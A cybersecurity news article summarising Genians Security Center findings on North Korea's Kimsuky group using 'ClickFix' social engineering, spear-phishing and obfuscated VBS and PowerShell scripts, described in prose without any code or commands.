Kimusky Hackers Employ ClickFix Technique to Run Malicious Scripts on Victim Devices

The North Korean state-sponsored hacker collective Kimsuky has been found to use a dishonest technique called “ClickFix” to compromise victim machines in a number of concerning cyberattacks.

First documented by Proofpoint in April 2024, ClickFix manipulates users into executing malicious scripts by disguising itself as legitimate troubleshooting guides or secure document verification processes.

This psychological manipulation tactic, often tied to Kimsuky’s ongoing “BabyShark” threat activity, has evolved into a global menace, with state-sponsored actors from Iran and Russia also adopting it, as revealed in subsequent reports by Sekoia and Proofpoint in 2024 and 2025.

A Sophisticated Social Engineering Tactic Unveiled

The Genians Security Center (GSC) flagged this activity in early 2025, underscoring the urgent need for robust endpoint detection and response (EDR) strategies to counter such obfuscated malware and abnormal behaviors.

Kimsuky’s ClickFix campaigns often begin with meticulously crafted spear-phishing emails, as seen in a January 2025 attack targeting a South Korean expert in diplomacy.

Posing as an East Asia correspondent for a Swiss newspaper, the attacker engaged the victim in prolonged communication before delivering a malicious URL containing a Visual Basic Script (VBS) file.

This script, obfuscated with random string insertions like “7539518426” to evade detection, executed commands to download payloads from a command-and-control (C2) server, establish persistence via scheduled tasks, and exfiltrate user data.

From Spear-Phishing to PowerShell Exploits

By March 2025, the group shifted to a more insidious ClickFix variant, impersonating a U.S. national security aide and tricking victims into pasting malicious PowerShell commands from a provided “Code.txt” file under the guise of accessing secure documents.

These commands, obscured through reverse-order obfuscation, mirrored earlier VBS patterns and connected to C2 servers like raedom[.]store, revealing consistent tactics across campaigns.

Another instance involved a fake defense job portal displaying popups that guided users to install Chrome Remote Desktop, enabling attackers to gain remote access via Secure Shell (SSH).

Such methods highlight Kimsuky’s adaptability in exploiting user trust and bypassing traditional security measures.

Linguistic cues, including North Korean terminology like “래일” (tomorrow) and “지령” (command), further attribute these attacks to the group, emphasizing the role of cultural and contextual analysis in threat attribution.

The ClickFix tactic, classified under MITRE ATT&CK as User Execution: Malicious Copy and Paste (T1204.004), poses a significant challenge due to its reliance on social engineering rather than direct exploits.

Genian EDR has proven effective in tracking these threats, offering visibility into PowerShell execution and subsequent processes like cmd.exe and schtasks.exe, while mapping C2 communications for actionable mitigation.

As Kimsuky continues to refine its approach evident in a June 2025 attack mimicking a Korean web portal’s security interface organizations must prioritize security awareness training and proactive endpoint protection to prevent unwitting execution of malicious scripts.

Indicators of Compromise (IoCs)

Find this News Interesting! Follow us on Google News, LinkedIn, and X to Get Instant Updates